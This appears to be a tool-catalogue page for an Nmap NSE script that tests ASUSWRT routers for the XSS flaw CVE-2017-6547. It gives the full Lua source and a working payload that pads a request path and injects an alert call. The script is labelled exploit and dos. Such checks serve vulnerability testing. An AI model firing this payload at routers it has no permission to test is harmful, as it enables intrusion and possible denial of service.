779-http-asuswrt-xss

ASUSWRT is a wireless router operating system that powers many routers produced by ASUS.

Ports

Any

Protocols

n/a

Attribution

Rewanth Cool (upstream: chinarulezzz/nmap-extra-nse)

Usage

Copy the command and adjust the target or script arguments as needed.

nmap --script http-asuswrt-xss <ip>

local http = require "http" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" local vulns = require "vulns" local nmap = require "nmap" description = [[ ASUSWRT is a wireless router operating system that powers many routers produced by ASUS. Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary JavaScript by requesting filenames longer than 50 characters. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application or steal cookie-based authentication credentials and gain unauthorized access. Failed exploit attempts will likely cause denial-of-service conditions. NOTE: This vulnerability is yet to be patched by the vendors. ]] --- -- @usage -- nmap --script http-asuswrt-xss <ip> -- -- @args -- http-asuswrt-xss.uri -- Default: '/' (Preferred) -- -- @output -- PORT STATE SERVICE -- 80/tcp open http -- | http-asuswrt-xss -- | VULNERABLE: -- | XSS -- | State: VULNERABLE (Exploitable) -- | IDs: -- | CVE: CVE-2017-6547 -- | Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT -- | on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary -- | JavaScript by requesting filenames longer than 50 characters. -- | -- | NOTE: This vulnerability is yet to be patched by the vendors. -- | -- | References: -- | http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6547 -- --- author = "Rewanth Cool" license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"vuln", "intrusive", "exploit", "dos"} portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") action = function(host, port) local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/" local payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('nmapXSSasuswrtScanner');'A" local pattern = "nmapXSSasuswrtScanner" -- Exploiting the vulnerability local response = http.get( host, port, uri..payload ) if( response.status == 200 ) then local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port) local vuln = { title = "Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT", state = vulns.STATE.NOT_VULN, description = [[ Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary JavaScript by requesting filenames longer than 50 characters. NOTE: This vulnerability is yet to be patched by the vendors. ]], IDS = { CVE = "CVE-2017-6547", references = { "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6547" }, dates = { disclosure = { year = "2017", month = "03", day = "08" }, } } } if( string.match(response.body, pattern) ) then vuln.state = vulns.STATE.EXPLOIT vuln.exploit_results = payload return vulnReport:make_output(vuln) end end end

Overview

Imported from the upstream repository chinarulezzz/nmap-extra-nse. ASUSWRT is a wireless router operating system that powers many routers produced by ASUS. Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary JavaScript by requesting filenames longer than 50 characters. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application or steal cookie-based authentication credentials and gain unauthorized access. Failed exploit attempts will likely cause denial-of-service conditions. NOTE: This vulnerability is yet to be patched by the vendors.

NSE LIB

779-http-asuswrt-xss

Usage

Overview